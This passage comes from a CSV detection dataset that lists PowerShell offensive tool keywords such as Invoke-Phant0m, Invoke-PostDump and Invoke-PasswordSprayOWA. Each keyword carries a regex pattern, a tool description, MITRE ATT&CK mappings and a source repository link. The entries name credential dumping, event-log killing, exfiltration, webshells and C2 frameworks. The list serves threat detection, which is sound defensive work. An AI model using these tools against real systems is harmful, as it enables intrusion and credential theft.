Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-PasswordSprayOWA*",".{0,1000}Invoke\-PasswordSprayOWA.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Invoke-Patamenia.ps1*",".{0,1000}Invoke\-Patamenia\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-PatchDll*",".{0,1000}Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PatchDll*",".{0,1000}Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PatchDll*",".{0,1000}Invoke\-PatchDll.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","Invoke-Phant0m","This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running. I have made this script for two reasons. First. This script will help to Red Teams and Penetration Testers. Second. I want to learn Powershell and Low-Level things on Powershell for cyber security field","T1059 - T1086 - T1216","TA0007 - TA0008","N/A","N/A","Defense Evasion","https://github.com/hlldz/Invoke-Phant0m","1","0","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*Invoke-Phant0m*",".{0,1000}Invoke\-Phant0m.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*Invoke-Phant0m.ps1*",".{0,1000}Invoke\-Phant0m\.ps1.{0,1000}","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1725","297","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*invoke-pipekat *",".{0,1000}invoke\-pipekat\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-Piper*",".{0,1000}Invoke\-Piper.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PiperClient*",".{0,1000}Invoke\-PiperClient.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PiperServer*",".{0,1000}Invoke\-PiperServer.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PipeShell.ps1*",".{0,1000}Invoke\-PipeShell\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PortBind*",".{0,1000}Invoke\-PortBind.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Portscan.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-Portscan*",".{0,1000}Invoke\-Portscan.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-PortScan*",".{0,1000}Invoke\-PortScan.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Invoke-Portscan.ps1*",".{0,1000}Invoke\-Portscan\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Portscan.ps1*",".{0,1000}Invoke\-Portscan\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1081","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PoshRatHttp*",".{0,1000}Invoke\-PoshRatHttp.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PoshRatHttps*",".{0,1000}Invoke\-PoshRatHttps.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PoshRatHttps*",".{0,1000}Invoke\-PoshRatHttps.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Invoke-PostDump*",".{0,1000}Invoke\-PostDump.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-PostExfil*",".{0,1000}Invoke\-PostExfil.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PostExfil.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PostExfil*",".{0,1000}Invoke\-PostExfil.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1142","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*Invoke-PowerDump*",".{0,1000}Invoke\-PowerDump.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - 